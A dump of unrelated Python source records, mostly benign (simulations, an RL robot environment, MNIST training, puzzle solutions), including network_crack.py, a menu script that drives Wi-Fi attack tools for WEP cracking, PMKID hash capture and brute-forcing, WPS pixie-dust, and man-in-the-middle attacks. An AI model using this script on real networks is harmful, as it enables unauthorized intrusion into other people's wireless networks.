Pred(0.3,1.0,0.8,0.08,[0.07,0.04,0.25,0.0],[0.0,0.0])\r\n\r\n\r\nx.append(x1)\r\nx.append(x2)\r\nx.append(x3)\r\nx.append(x4)\r\ny.append(y1)\r\ny.append(y2)\r\n\r\n\r\n#this is a work in progress to make CLV_PlotAll more readable\r\ndef Iterate_once(x,y,h,t):\r\n\tsize = len(x) + len(y)\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += h*vec[i]\r\n\t\tt += h/size\r\n\t\tprint (t, x[i].number, end = \" \")\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += h*vec[i]\r\n\t\tt += h/size\r\n\t\tprint (t, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\r\n\r\n\t\r\n#this function takes a list of prey (x) and preds (y) and evolves them out to t in n steps (leapfrog algorithm)... this is one place where the code could definitely be improved as a higher order version would be much better obviously\r\n#it prints out the current time along with the relevant population so that output looks like a bunch of colums, relating to the species in question. This can then be plotted with something like gnuplot.\r\ndef CLV_PlotAll(x,y,t,n):\r\n\th = t/n\r\n\tsize = len(x) + len(y)\r\n\tt_ticking = 0.0\r\n\t\r\n\t#step zero (prints out starting x and y with corresponding t)\r\n\t\r\n\tfor i in range(0, len(x)):\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\tfor i in range(0, len(y)):\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\t\r\n\t#step one\r\n\t\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += (1+i)*(h/size)*vec[i]\r\n\t\tt_ticking += h/size\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += (1+i+len(x))*(h/size)*vec[i]\r\n\t\tt_ticking += h/size\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\tprint(\"\")\r\n\r\n\t#main part of algorithm\r\n\tfor j in range (0,n-1):\r\n\t\tfor i in range (0,len(x)):\r\n\t\t\tvec = CLVx(x,y)\r\n\t\t\tx[i].number += h*vec[i]\r\n\t\t\tt_ticking += h/size\r\n\t\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\t\tfor i in range (0,len(y)):\r\n\t\t\tvec = CLVy(x,y)\r\n\t\t\ty[i].number += h*vec[i]\r\n\t\t\tt_ticking += h/size\r\n\t\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\t\tprint(\"\")\r\n\t\r\n\t#last step\r\n\tt_ticking = t\r\n\tfor i in range (0,len(x)):\r\n\t\tvec = CLVx(x,y)\r\n\t\tx[i].number += h/size * (size - 1 - i)*vec[i]\r\n\t\tprint (t_ticking, x[i].number, end = \" \")\r\n\t\r\n\tfor i in range (0,len(y)):\r\n\t\tvec = CLVy(x,y)\r\n\t\ty[i].number += h/size * (size - 1 - i - len(x))*vec[i]\r\n\t\tprint (t_ticking, y[i].number, end = \" \")\r\n\r\n\treturn x,y\r\n\t\r\nCLV_PlotAll(x,y,500.0,1500)\r\n","sub_path":"MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":6352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"209118142","text":"\nimport sys, os, random, time\nfrom math import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport numpy as np\nimport world_class as wc\nimport ode\n\n\nclass Hopping(wc.W2):\n def __init__(self):\n #親クラスを初期化\n super(Hopping,self).__init__(bon=1,g=4.0)\n\n self.Time_Limit=500\n\n #各次元数\n self.s_dim=6\n self.act_dim=2\n\n #入力の値の範囲(全次元統一で−1、1)\n self.act_high_low=np.array([1,-1])#入力は必ず-1から1の範囲とする\n\n #行動の角次元のトルクの最大絶対値\n self.act_scale=np.array([-50,50])#入力をこれでスケーリングして使う\n\n\n #x方向を軸とする回転行列を生成する関数\n def rotate_x(self,r):\n\n C = np.cos(r)\n S = np.sin(r)\n\n # x軸周りの回転行列\n R_x = [[1, 0, 0],[0, C, -S],[0, S, 
C]]\n\n return R_x\n\n #z方向を軸とする回転行列を生成する関数\n def rotate_z(self,r):\n\n C = np.cos(r)\n S = np.sin(r)\n\n # z軸周りの回転行列\n R_z=[[C,-S,0],[S,C,0],[0,0,1]]\n\n return R_z\n\n\n\n #hoppingロボットを生成\n def set_bodies(self):\n\n #初期に傾ける角度を決定\n rand=np.random.uniform(-np.pi/8,np.pi/8)\n\n #乱数をもとに回転行列を生成。\n Rx=self.rotate_x(rand)\n Rz=self.rotate_z(rand)\n\n #原点の周りにx軸回転し、そのあとに移動した点周りにz軸回転\n r=np.dot(Rz,Rx)\n\n #リストからタプルに変換\n R=[]\n for i in range(0,3):\n for j in range(0,3):\n R.append(r[i][j])\n\n\n #回転行列を用いて頭の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[4],[0]]))\n x1=M[0]\n y1=M[1]\n z1=M[2]\n\n #回転行列を用いて足1の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[3],[0]]))\n x2=M[0]\n y2=M[1]\n z2=M[2]\n\n #回転行列を用いて足2の位置の導出\n M=np.dot(Rz,np.dot(Rx,[[0],[2],[0]]))\n x3=M[0]\n y3=M[1]\n z3=M[2]\n\n\n #オブジェクトの生成\n self.create_ball(position=(x1,y1,z1),rotation=R,m=25,r=0.5)#あしのひら\n\n\n self.create_link(position=(x2,y2,z2),rotation=R,lx=0.1,ly=1,lz=0.1)#あしのひら\n\n self.create_link(position=(x3,y3,z3),rotation=R,lx=0.05,ly=1,lz=0.05)#あしのひら\n\n\n #geomの設定\n for g in self.geom:\n self.gp[1].add(g)\n\n\n #jointの設定\n self.j.append(ode.HingeJoint(self.world))\n self.j[0].attach(self.parts[0],self.parts[1])\n self.j[0].setAxis((0,2,0))\n self.j[0].setAnchor((1,0,0))\n self.j[0].setParam(ode.ParamVel,0)\n\n self.j.append(ode.SliderJoint(self.world))\n self.j[1].attach(self.parts[1],self.parts[2])\n self.j[1].setAxis((0,1,0))\n self.j[1].setParam(ode.ParamHiStop,-0.1)\n self.j[1].setParam(ode.ParamLoStop,0.1)\n\n #胴体と足1を固定する\n self.j.append(ode.FixedJoint(self.world))\n self.j[2].attach(self.parts[0],self.parts[1])\n self.j[2].setFixed()\n\n #足1と足2を固定する\n self.j.append(ode.FixedJoint(self.world))\n self.j[3].attach(self.parts[1],self.parts[2])\n self.j[3].setFixed()\n\n #観測した状態を出力する関数\n def return_observation(self):\n\n pos =self.parts[0].getPosition()\n # x2 =link2.getPosition()\n\n #球と足の状態を取得\n pinP=self.parts[0].getPosition()\n linkP=self.parts[1].getPosition()\n\n #位置の差分を計算\n x=pinP[0]-linkP[0]\n y=pinP[1]-linkP[1]\n z=pinP[2]-linkP[2]\n\n #足の中心と球の距離を計算\n R1=np.sqrt(y**2+z**2)\n\n #球の角���を計算\n sita1=np.arcsin(z/R1)\n\n R2=(x**2+y**2)**(1/2)\n\n sita2=np.arcsin(x/R2)\n\n w=self.parts[0].getLinearVel()\n\n obs = np.array([pos[0],sita1,w[0],pos[2],sita2,w[2]])\n\n\n return obs\n\n\n def return_reward(self,obs):#報酬を返す\n\n pos_link2=self.parts[2].getPosition()\n pos_head=self.parts[0].getPosition()\n\n\n if(pos_head[2]<-5 or pos_head[2]>5 or pos_head[1]<1):\n r=-10\n\n else:\n r=10-(abs(obs[0]))-abs(obs[1])-abs(obs[2])-(abs(obs[3]))-(abs(obs[4]))-abs(obs[5])-(abs(pos_link2[0]))-abs(pos_link2[2])\n\n\n return r\n\n\n\n def step(self,action):#アクションを入力すると演算して次の状態、報酬、終了フラグ、0を返す\n\n u=[0.0,0.0]\n #actionは1~-1の尺度で渡す\n action=action*self.act_scale#アクションをトルクのスケールにする\n\n #10%の確率で行動にノイズを加える。\n if(np.random.rand()<0.1):\n noise1=np.random.normal()\n else:\n noise1=0\n\n if(np.random.rand()<0.1):\n noise2=np.random.normal()\n else:\n noise2=0\n\n\n #行動の実行\n u[0]=action[0]+noise1\n u[1]=action[1]+noise2\n\n\n #球と足の状態を取得\n pinP=self.parts[0].getPosition()\n linkP=self.parts[1].getPosition()\n\n R=(pinP[0]**2+pinP[1]**2)**(1/2)\n\n y=pinP[1]-linkP[1]\n x=pinP[0]-linkP[0]\n\n arcsitaxy=x/R\n\n #角度のクリッピング(overflow防止)\n if abs(arcsitaxy)>=0.99999:\n arcsitaxy=0.99999\n\n sitaxy=np.arcsin(arcsitaxy)\n\n #位置の差分を計算\n y=pinP[1]-linkP[1]\n z=pinP[2]-linkP[2]\n\n #足の中心と球の距離を計算\n R=np.sqrt(y**2+z**2)\n\n arcsitayz=z/R\n\n #角度のクリッピング(overflow防止)\n if abs(arcsitayz)>=0.99999:\n arcsitayz=0.99999\n\n sitayz=np.arcsin(arcsitayz)\n\n #球の状態に合わせて左右に力を加える\n 
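rotate_x and rotate_z above build the standard 3x3 rotation matrices, which set_bodies() composes as Rz.Rx to tilt the robot; any pure rotation preserves vector length, which gives a cheap sanity check. A sketch reusing the 4-unit head offset from the record:

    import numpy as np

    def rotate_x(r):
        c, s = np.cos(r), np.sin(r)
        return np.array([[1, 0, 0], [0, c, -s], [0, s, c]])

    def rotate_z(r):
        c, s = np.cos(r), np.sin(r)
        return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]])

    r = np.pi / 8
    R = rotate_z(r) @ rotate_x(r)         # same composition order as set_bodies()
    head = R @ np.array([0.0, 4.0, 0.0])  # the (0, 4, 0) head offset used above
    assert np.isclose(np.linalg.norm(head), 4.0)  # rotations preserve length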
self.parts[0].addForce((u[1]*np.sin(np.pi/2-sitaxy),-u[0]*np.cos(np.pi/2-sitayz)-u[1]*np.cos(np.pi/2-sitaxy),u[0]*np.sin(np.pi/2-sitayz)))\n\n\n self.space.collide((self.world, self.contactgroup), self.near_callback)\n\n # Simulation step\n self.world.step(self.dt)\n\n # Remove all contact joints\n self.contactgroup.empty()\n\n self.total_time += self.dt\n self.lasttime = time.time()\n s=self.return_observation()\n r=self.return_reward(s)\n\n self.T+=1\n if self.T>=self.Time_Limit:\n done=True\n else:\n done=False\n #done=max(False,Kokeru)#時間が過ぎていなくても、こけていれば終了\n #print(self.link[2].getPosition[2])\n self.view_posi=(-10,2,self.parts[2].getPosition()[2])\n self.focus_posi=(0,2,self.parts[2].getPosition()[2])\n\n return s,r,done,0#状態、報酬、終了フラグ、0\n\n\n\n def _keyfunc (self,c, x, y):#キーボード、任意に書き換える\n print(c)\n if c==102:\n self.j[0].addTorque(10)\n elif c==103:\n self.j[0].addTorque(-10)\n elif c==100:\n self.j[1].addTorque(10)\n elif c==101:\n self.j[1].addTorque(-10)\n print(c)\n\n\n def reset(self):#環境をリセット\n\n self.set_init()#クラスを初期化\n self.set_bodies()\n self.T=0\n s=self.return_observation()\n return s\n","sub_path":"TRPO/Hopping_test.py","file_name":"Hopping_test.py","file_ext":"py","file_size_in_byte":7427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"54767773","text":"\n\n\n\nimport sys\nimport serial\nimport time\n\ndef flush(serial_port):\n serial_port.reset_input_buffer()\n serial_port.reset_output_buffer()\n time.sleep(0.001)\n\ndef send_command(serial_port, input_string, delay_time):\n to_microcontroller_msg = f'{input_string}'\n serial_port.write(to_microcontroller_msg.encode('UTF-8'))\n if delay_time < 0:\n delay_time = 0\n time.sleep(delay_time/1000)\n\ndef sleepUntil(start_time, wait_until_since_start, dt):\n # the wall time when this function should complete:\n final_time = start_time + wait_until_since_start\n # then loop until we've waited long enough\n while time.time() < final_time:\n time.sleep(dt)\n\ndef execute_gait_cycle(serial_port, action_dict): \n actions = action_dict\n primitives = actions.keys()\n start_time = time.time()\n command_sequence = sorted(actions.items())\n for command in command_sequence:\n msg = command[1]\n command_time = command[0]\n #print(\"Attempting to send \" + msg + \" at time \" + str(command_time) + \", current time is \" + str((rospy.get_time() - start_time)*1000))\n sleepUntil(start_time,command_time/float(1000), 0.001)\n #print(\"After sleeping current time is: \" + str((rospy.get_time() - start_time)*1000))\n\n # 1) add on the required newline\n if msg[-1] != \"\\n\":\n msg = msg + \"\\n\"\n # We seem to be getting some mis-aligned commands.\n # So, before anything else, write a newline each time. This should clear the junk out?\n \n #self.serial_port.write(\"! c\\n\")\n # give the microcontroller a moment\n # maybe 20 ms?\n clear_delay = 0.02\n time.sleep(clear_delay)\n \n #self.serial_port.write(\"! 
c\\n\")\n # 3) Send the message\n send_command(serial_port, msg, 0)\n # send debugging back to terminal\n print(\"Wrote command to serial port: \" + msg[:-1] + \" @; \" + str((time.time() - start_time)*1000))\n\n else:\n print(\"Invalid action\")\n #Send ready gisignal\n print(\"Done.\")\n\ndef mayonnaise_instrument(device_name, activation_time = 250, frequency = 1, phase = 0.5):\n print(device_name, activation_time, frequency, phase)\n # A welcome message\n print(\"Running serial_tx_cmdline node with device: \" + device_name)\n # create the serial port object, non-exclusive (so others can use it too)\n serial_port = serial.Serial(port=device_name, baudrate=115200, timeout=1,\n exclusive=False) # flush out any old data\n flush(serial_port)\n # finishing setup.\n print(\"Opened port. Ctrl-C to stop.\")\n # activation_time = 70\n # frequency = 1.2\n # phase = 0.5\n period = 1000/frequency # milliseconds\n cooling_time = period - activation_time\n active = 300\n send_command(serial_port, \"p \" + str(activation_time), 0)\n w = 0\n # If not using ROS, we'll do an infinite loop:\n while True:\n # request something to send\n try:\n # execute_gait_cycle(serial_port, {100: \"h 2 18\", 300: \"l 2 18\", 301: \"h 1 3 16 19\", 600: \"l 1 3 16 19\", 650: \"h 0 1 16 17\", 850: \"l 0 1 16 17\",\n # 851+w: \"h 0 1 18 19\", 1050+w: \"l 0 1 18 19\", 1100+w: \"h 0 1 18 19\", 1300+w: \"l 0 1 18 19\", 2500+w: \"s\"})\n # execute_gait_cycle(serial_port, {100: \"h 2 18\", 300: \"l 2 18\", 301: \"h 1 3 16 19\", 600: \"l 1 3 16 19\", \n # 650: \"h 0 1 16 17\", 950: \"l 0 1 16 17\", 1500: \"s\"})\n # WD Patrick\n # execute_gait_cycle(serial_port, {100: \"h 5 19\", 300: \"l 5 19\", 400: \"h 4 6 16 18\", 700: \"l 4 6 16 18\", \n # 701: \"h 6 16\", 1000: \"h 7 17\", 1350: \"l 6 16\", 1450: \"l 7 17\", 3000: \"s\"})\n # # normal weighted PATRICK\n\n # MiniPATRICK Tests\n #execute_gait_cycle(serial_port, {1: \"h 0\", 50: \"h 2\", 150: \"l 0\", 201: \"h 1\", 250: \"l 2\", 350: \"h 3\", 400: \"l 1\", 500: \"h 0\", 550: \"l 3\"})\n execute_gait_cycle(serial_port, {1: \"h 0 2\", active: \"l 0 2\", 2000: \"h 1 3\", 2000 + active: \"l 1 3\", 4000: \"l 0 2\"})\n\n # normal weighted PATRICK\n # execute_gait_cycle(serial_port, {100: \"h 0 14\", 300: \"l 0 14\", 400: \"h 1 3 13 15\", 700: \"l 1 3 13 15\", \n # 701: \"h 3 13\", 1000: \"h 2 12\", 1350: \"l 3 13\", 1450: \"l 2 12\", 3000: \"s\"})\n\n # execute_gait_cycle(serial_port, {100: \"h 4 18\", 300: \"l 4 18\", 400: \"h 5 6 19 17\", 700: \"l 5 6 19 17\", \n # 701: \"h 5 17\", 1000: \"h 7 16\", 1350: \"l 5 17\", 1450: \"l 7 16\", 3000: \"s\"})\n # execute_gait_cycle(serial_port, {100: \"h 1 15\", 200: \"l 1 15\", 210: \"h 0 2 12 14\", 350: \"l 0 2 12 14\", \n # 351: \"h 2 12\", 360: \"h 3 13\", 600: \"l 2 3 12 13\", 3000: \"s\"})\n except KeyboardInterrupt:\n # Nicely shut down this script.\n print(\"\\nShutting down serial_tx_cmdline...\")\n sys.exit()\n\n\n\n # the main function: just call the helper, while parsing the serial port path.\nif __name__ == '__main__':\n try:\n # the 0-th arg is the name of the file itself, so we want the 1st.\n mayonnaise_instrument(sys.argv[1])\n except KeyboardInterrupt:\n # why is this here?\n pass\n\n","sub_path":"MiniPatrick/patrick_demo.py","file_name":"patrick_demo.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477622974","text":"# 输入两棵二叉树A,B,判断B是不是A的子结构。(ps:我们约定空树不是任意一个树的子结构\n# -*- coding:utf-8 -*-\nclass TreeNode:\n def __init__(self, 
x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def HasSubtree(self, pRoot1, pRoot2):\n # write code here\n if not pRoot1 or not pRoot2:\n return False\n return self.is_subtree(pRoot1, pRoot2) or self.HasSubtree(pRoot1.left, pRoot2) \\\n or self.HasSubtree(pRoot1.right, pRoot2)\n\n def is_subtree(self, A, B):\n if not B:\n return True\n if not A or A.val != B.val:\n return False\n return self.is_subtree(A.left, B.left) and self.is_subtree(A.right, B.right)\n\nclass Solution1:\n def __init__(self):\n self.lst = []\n\n def add_to_lst(self, pRoot):\n if pRoot is None:\n return\n self.lst.append(pRoot.val)\n self.add_to_lst(pRoot.left)\n self.add_to_lst(pRoot.right)\n\n def HasSubtree(self, pRoot1, pRoot2):\n # write code here\n if pRoot1 == None or pRoot2 == None:\n return False\n\n self.add_to_lst(pRoot1)\n list1 = self.lst\n self.lst = []\n self.add_to_lst(pRoot2)\n list2 = self.lst\n while len(list1) != len(list2):\n if list1[:len(list2)] == list2:\n return True\n else:\n list1 = list1[1:]\n if list1 == list2:\n return True\n else:\n return False\n\nif __name__ == '__main__':\n s = Solution()\n node1 = TreeNode(1)\n node2 = TreeNode(2)\n node3 = TreeNode(3)\n node4 = TreeNode(4)\n node5 = TreeNode(5)\n node1.left = node2\n node1.right = node3\n node3.left = node4\n node3.right = node5\n print(s.HasSubtree(node1, node3))\n\n","sub_path":"树的字结构.py","file_name":"树的字结构.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"135955056","text":"import os\nfrom colorama import Fore, Style\n\n\ninterface = input(Fore.CYAN + '[*]Enter interface to use: ' + Style.RESET_ALL)\nos.system('airmon-ng start ' + interface)\n\ndef wait():\n wait = input('PRESS ENTER TO CONTINUE')\n\ndef main():\n print(' _ __ __ ______ ______ __')\n print(' / | / /__ / /_ / ____/____/ ____ \\_____/ /__')\n print(' / |/ / _ \\/ __/ / / / ___/ / __ `/ ___/ //_/')\n print(' / /| / __/ /_ / /___/ / / / /_/ / /__/ ,<')\n print(' /_/ |_/\\___/\\__/____\\____/_/ \\ \\__,_/\\___/_/|_|')\n print(' /_____/ \\____/')\n print('==========================================================')\n print('*[1] Scan Local Networks (Airodump-ng) *')\n print('*[2] Scan Local Networks (Wash) *')\n print('*[3] Crack WEP Network *')\n print('*[4] Crack WPA/WPA2 Network Using PMKID Method *')\n print('*[5] Crack WPA/WPA2 Network Using PIN (Pixie-Dust) Method*')\n print('*[6] Wifite2 (Automated Network Cracker) *')\n print('*[7] Ettercap (MiTM Attack) *')\n print('*[8] Fluxion (MiTM/Router Spoof Attack) *')\n print('*[9] Exit *')\n print('==========================================================')\n in_put = input(': ')\n if in_put == '1':\n print(Fore.CYAN + '[*]Make sure to note down network bssid and channel number...')\n print('[*]Enter ^C or ^Z to exit scanner mode...' + Style.RESET_ALL)\n os.system('airodump-ng ' + interface + 'mon')\n wait()\n main()\n if in_put == '2':\n print(Fore.CYAN + '[*]Make sure to note down network bssid and channel number...')\n print('[*]Enter ^C or ^Z to exit scanner mode...' + Style.RESET_ALL)\n os.system('wash -i ' + interface + 'mon')\n wait()\n main()\n if in_put == '3':\n bssid = input(Fore.CYAN + '[*]Enter WEP Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter WEP Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Gathering Packets From Network: ' + bssid + '... 
(Wait Until You Have About 1000 IVs)' + Style.RESET_ALL)\n os.system('besside-ng -b ' + bssid + ' -c ' + channel + ' ' + interface + 'mon')\n os.system('aircrack-ng wep.pcap')\n wait()\n main()\n if in_put == '4':\n adapt = input(Fore.CYAN + '[*]Do you have a wifi adapter with packet injection?[y/N]: ' + Style.RESET_ALL)\n if adapt == 'y' or adapt == 'Y':\n bssid = input(Fore.CYAN + '[*]Enter WPA/WPA2 Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter WPA/WPA2 Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Starting PMKID Attack...')\n print('[*]Wait about 10 minutes to gather enough packets, use ^C or ^Z to end hcxdumptool...' + Style.RESET_ALL)\n os.system('hcxdumptool -i ' + interface + 'mon -o output.pcapng --enable_status=1')\n print(Fore.CYAN + '[*]Converting output.pcapng to ouputHC.16800 for hashcat bruteforcing...' + Style.RESET_ALL)\n os.system('hcxpcaptool -E essidlist -I identitylist -U usernamelist -z outputHC.18600 output.pcapng')\n print(Fore.GREEN + '[+]File Converted! Use hashcat in these two methods to crack: ' + Style.RESET_ALL)\n print(Fore.CYAN + ' [*] Wordlist: hashcat -m 16800 outputHC.16800 -a 0 --force wordlist.lst -O')\n print(Fore.CYAN + ' [*]Bruteforce: hashcat -m 16800 outputHC.16800 -a 3 --force ?a?a?a?a?a?a -O')\n wait()\n main()\n else:\n print(Fore.RED + \"[*]You can't attack a WPA/WPA2 encrypted network without packet injection...\" + Style.RESET_ALL)\n wait()\n main()\n if in_put == '5':\n bssid = input(Fore.CYAN + '[*]Enter Network BSSID: ' + Style.RESET_ALL)\n channel = input(Fore.CYAN + '[*]Enter Network Channel: ' + Style.RESET_ALL)\n print(Fore.CYAN + '[*]Running Reaver to attack WPS PIN exploit...' + Style.RESET_ALL)\n os.system('reaver -i ' + interface + 'mon -b ' + bssid + ' -c ' + channel + ' -vv -Z')\n wait()\n main()\n if in_put == '6':\n print(Fore.CYAN + '[*]Starting Wifite2...' + Style.RESET_ALL)\n try:\n os.chdir('wifite2')\n os.system('python3 Wifite.py')\n print(Fore.GREEN + '[+]Successfully ran wifite.py!' + Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running wifite.py' + Style.RESET_ALL)\n os.chdir('..')\n main()\n if in_put == '7':\n got = input(Fore.CYAN + '[*]Do you want to run ettercap in Graphical or Text mode?[G/T]: ' + Style.RESET_ALL)\n try:\n if got == 'G':\n print(Fore.CYAN + '[*]Running ettercap in graphical mode...' + Style.RESET_ALL)\n os.system('sudo ettercap -G')\n print(Fore.GREEN + '[+]Successfully ended ettercap in graphical mode!' + Style.RESET_ALL)\n else:\n print(Fore.CYAN + '[*]Running ettercap in text mode...' + Style.RESET_ALL)\n os.system('sudo ettercap -T')\n print(Fore.GREEN + '[+]Successfully ended ettercap in text mode!' + Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running ettercap!' + Style.RESET_ALL)\n wait()\n main()\n if in_put == '8':\n print(Fore.CYAN + '[*]Starting Fluxion...' + Style.RESET_ALL)\n try:\n os.chdir('fluxion')\n os.system('./fluxion.sh')\n print(Fore.GREEN + '[+]Successfully ran fluxion.sh!' 
+ Style.RESET_ALL)\n except:\n print(Fore.RED + '[*]Error running fluxion.sh' + Style.RESET_ALL)\n os.chdir('..')\n main()\n if in_put == '9':\n exit()\n\nmain()\n","sub_path":"network_crack.py","file_name":"network_crack.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"330079464","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nfrom leetcode.Util import ListNode\nfrom leetcode import Util\nimport heapq\n\n\nclass Solution:\n def mergeKLists(self, lists):\n h = [(node.val, id(node), node) for node in lists if node is not None]\n if len(h) == 0:\n return None\n heapq.heapify(h)\n head = ListNode(0)\n cur = head\n while h:\n val, i, node = heapq.heappop(h)\n cur.next = node\n cur = node\n node = node.next\n if node:\n heapq.heappush(h, (node.val, id(node), node))\n return head.next\n\n\ns = Solution()\nprint(s.mergeKLists([Util.createListNode([1, 4, 5]),\n Util.createListNode([1, 3, 4]),\n Util.createListNode([2, 6])]))\n","sub_path":"leetcode/2021/merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"80391879","text":"import tensorflow as tf\nimport tensorflow.examples.tutorials.mnist.input_data as input_data\nfrom com.kailin.api_image import api_image\nfrom com.kailin.tensorflow.api_tensorflow import api_tensorflow as api_tf\nfrom time import time\n\nmnist = input_data.read_data_sets(\"mnist_data/\", one_hot=True)\n# print(\"train\", mnist.train.num_examples)\n# print(\"validation\", mnist.validation.num_examples)\n# print(\"test\", mnist.test.num_examples)\n# api_image.showImageLabelPredictionHot(mnist.train.images, mnist.train.labels, [], 0)\n# api_image.showImageLabelPredictionHot(mnist.validation.images, mnist.validation.labels, [], 0)\n# api_image.showImageLabelPredictionHot(mnist.test.images, mnist.test.labels, [], 0)\n\n# 建立神經網路\nx = tf.placeholder(\"float\", [None, 784])\nh1 = api_tf.layer(dim_in=784, dim_out=256, inputs=x, activation=tf.nn.relu)\nh2 = api_tf.layer(dim_in=256, dim_out=64, inputs=h1)\ny_predict = api_tf.layer(dim_in=64, dim_out=10, inputs=h2)\n# 定義訓練方式\ny_label = tf.placeholder(\"float\", [None, 10])\nloss_function = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=y_predict, labels=y_label))\noptimizer_function = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss_function)\n# 評估模型準確率\ncorrect_predcit = tf.equal(tf.argmax(y_label, 1), tf.argmax(y_predict, 1))\n# 將預測結果進行平均\naccuracy = tf.reduce_mean(tf.cast(correct_predcit, \"float\"))\n\ntrainEpochs = 15\nbatchSize = 100\nloss_list = []\nepoch_list = []\naccuracy_list = []\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(trainEpochs):\n startTime = time()\n # 分批訓練\n for i in range(int(mnist.train.num_examples / batchSize)):\n batch_x, batch_y = mnist.train.next_batch(batchSize)\n sess.run(optimizer_function, feed_dict={x: batch_x, y_label: batch_y})\n loss, acc = sess.run([loss_function, accuracy],\n feed_dict={x: mnist.validation.images, y_label: mnist.validation.labels})\n epoch_list.append(epoch)\n loss_list.append(loss)\n accuracy_list.append(acc)\n print(\"Train Epoch=\", \"%02d\" % (epoch + 1),\n \"Train Time=\", time() - startTime,\n \"Loss=\", \"{:.9f}\".format(loss),\n \"Accuracy=\", acc)\n 
print(\"Accuracy\", sess.run(accuracy, feed_dict={x: mnist.test.images, y_label: mnist.test.labels}))\n prediction = sess.run(tf.argmax(y_predict, 1), feed_dict={x: mnist.test.images})\n api_image.showImageLabelPredictionHot(mnist.test.images, mnist.test.labels, prediction, 0)\n","sub_path":"tensorflow/com/kailin/tensorflow/t03.py","file_name":"t03.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"447374821","text":"import math\nimport os\nfrom collections import deque\nfrom itertools import count\n\ndef add_marble(marble, circle):\n circle.rotate(-1)\n circle.append(marble)\n return circle\n\ndef score_marble(marble, circle):\n circle.rotate(7)\n removed = circle.pop()\n circle.rotate(-1)\n return (marble, removed)\n\ndef scores():\n circle = deque((0,))\n for marble in count(1):\n if (marble % 23) == 0:\n yield score_marble(marble, circle)\n else:\n circle = add_marble(marble, circle)\n\ndef high_score_with_caching():\n cached_scores = list()\n score_generator = scores()\n\n def high_score(players, marbles):\n no_of_scores = math.floor(marbles/23)\n\n while len(cached_scores) < no_of_scores:\n cached_scores.append(next(score_generator))\n\n player_scores = dict()\n for score in [s for s in cached_scores if s[0] <= marbles]:\n player = (score[0] - 1) % players\n player_scores[player] = (player_scores.get(player, ()) + score)\n\n return max(sum(player) for player in player_scores.values())\n\n return high_score\n\nhigh_score = high_score_with_caching()\n\ndef main():\n with open(os.path.join(os.path.dirname(__file__), 'input.txt'), 'r') as f:\n input = f.read().strip().split(' ')\n players, last_marble = int(input[0]), int(input[6])\n print('part one: ', high_score(players, last_marble))\n print('part two: ', high_score(players, last_marble*100))\n\nif __name__ == '__main__':\n main()\n","sub_path":"09/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"331196962","text":"\"\"\"\nAuthor: Xiangyi Luo\n\nParsing information of stackoverflow dump\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport re\nimport csv\n\ndata_path = './../dataset/stackoverflow/Posts.xml'\n\nparsed_data = []\n# id, type, parent-id, score, text, code\nparsed_data_path = 'parsed_stackoverflow.csv'\nparsed_data_file = open(parsed_data_path, 'w+')\nwr = csv.writer(parsed_data_file, quoting=csv.QUOTE_ALL)\nwr.writerow(['id', 'type', 'parent_id', 'score', 'text', 'code'])\n\ni = 0\nmax_post = 50000\nfor event, elem in ET.iterparse(data_path):\n if i > max_post:\n break\n\n if elem.tag == 'row':\n if elem.attrib['PostTypeId'] == '1' and re.search('android', elem.attrib['Tags']):\n # print('=====')\n # print(elem.attrib)\n\n tags = re.findall(r'<.+?>', elem.attrib['Tags'])\n tags = ','.join(list(map(lambda x: x.replace('<', '').replace('>', ''), tags)))\n\n # print(tags)\n\n api = re.sub(r'-\\d+\\.*\\d*', '', tags)\n api = 